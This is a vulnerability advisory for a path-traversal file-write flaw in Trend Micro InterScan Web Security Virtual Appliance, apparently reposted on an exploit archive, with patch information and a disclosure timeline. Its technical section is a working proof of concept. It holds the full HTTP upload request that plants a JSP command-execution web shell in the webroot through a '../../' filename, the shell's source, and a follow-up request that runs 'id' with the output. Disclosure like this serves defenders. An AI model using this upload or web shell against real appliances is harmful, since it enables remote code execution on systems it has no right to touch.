Trendmicro InterScan 6.5-SP2_Build_Linux_1548 Arbitrary File Write Vulnerability

2017-02-18T00:00:00
ID 1337DAY-ID-27045
Type zdt
Reporter Matt Bergin
Modified 2017-02-18T00:00:00

Description

Exploit for windows platform in category remote exploits

                                        
                                            Title: Trendmicro InterScan Arbitrary File Write
Publication Date: 2017.02.15
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-001.txt


1. Vulnerability Details

Affected Vendor: Trendmicro
Affected Product: InterScan Web Security Virtual Appliance
Affected Version: OS Version 3.5.1321.el6.x86_64; Application
Version 6.5-SP2_Build_Linux_1548
Platform: Embedded Linux
CWE Classification: CWE-22: Improper Limitation of a Pathname to
a Restricted Directory ('Path Traversal'),
CWE-434: Unrestricted Upload of File with
Dangerous Type
Impact: Remote Code Execution
Attack vector: HTTP

2. Vulnerability Description

An authenticated user can create files on the local system.
This can lead to remote command execution as an authenticated
user.

3. Technical Description

A servlet takes an arbitrary file path as an output filename,
and the webserver can create files in the webroot. So, a
malicious .jsp can be uploaded and then executed through a
subsequent request to the webserver. Shell courtesy the
fuzzdb-project
(https://github.com/fuzzdb-project/fuzzdb/blob/master/web-backdoors/jsp/cmd.jsp).

POST /servlet/com.trend.iwss.gui.servlet.ConfigBackup?action=upload_check
HTTP/1.1
Host: 1.3.3.7:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0)
Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://1.3.3.7:8443/config_backup_collapsed.jsp
Cookie: JSESSIONID=E600D5296A2282C4C7AD46BCDAADEB47
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data;
boundary=---------------------------135470425518767155135967265
Content-Length: 1486

-----------------------------135470425518767155135967265
Content-Disposition: form-data; name="CSRFGuardToken"

4POCBRSFC1TYEO2D5IHNLLJAX27BNBLF
-----------------------------135470425518767155135967265
Content-Disposition: form-data; name="op"

save
-----------------------------135470425518767155135967265
Content-Disposition: form-data; name="uploadfile";
filename="../../../../usr/iwss/AdminUI/tomcat/webapps/ROOT/korelogic.jsp"

<%@ page import="java.util.*,java.io.*"%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>
-----------------------------135470425518767155135967265
Content-Disposition: form-data; name="beFullyOrPartially"

0
-----------------------------135470425518767155135967265--

HTTP/1.1 302 Found
Server: Apache-Coyote/1.1
Location:
https://1.3.3.7:8443/config_backup_collapsed.jsp?CSRFGuardToken=4POCBRSFC1TYEO2D5IHNLLJAX27BNBLF&errorMessage=6
Content-Length: 0
Date: Tue, 25 Oct 2016 14:36:07 GMT
Connection: close

GET /korelogic.jsp?CSRFGuardToken=4POCBRSFC1TYEO2D5IHNLLJAX27BNBLF&cmd=id HTTP/1.1
Host: 1.3.3.7:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://1.3.3.7:8443/korelogic.jsp
Cookie: JSESSIONID=E600D5296A2282C4C7AD46BCDAADEB47
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Length: 320
Date: Tue, 25 Oct 2016 14:37:58 GMT
Connection: close

<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<input type="hidden" name="CSRFGuardToken" value="4POCBRSFC1TYEO2D5IHNLLJAX27BNBLF">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
Command: id<BR>
uid=498(iscan) gid=499(iscan) groups=499(iscan)

</pre>
</BODY></HTML>

4. Mitigation and Remediation Recommendation

The vendor has issued a patch for this vulnerability in Version
6.5 CP 1737. Security advisory and link to the patched version
available at:

https://success.trendmicro.com/solution/1116672

5. Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc.

6. Disclosure Timeline

2016.12.12 - KoreLogic sends vulnerability report and PoC to
Trendmicro.
2016.12.15 - Trendmicro acknowledges receipt of report.
2017.01.11 - Trendmicro informs KoreLogic that the patch to
this and other KoreLogic reported issues will
likely be available after the 45 business day
deadline (2017.02.16).
2017.02.06 - Trendmicro informs KoreLogic that the patched
version will be available by 2017.02.14.
2017.02.14 - Trendmicro security advisory released.
2017.02.15 - KoreLogic public disclosure.

7. Proof of Concept

See 3. Technical Description.

#  0day.today [2018-03-16]  #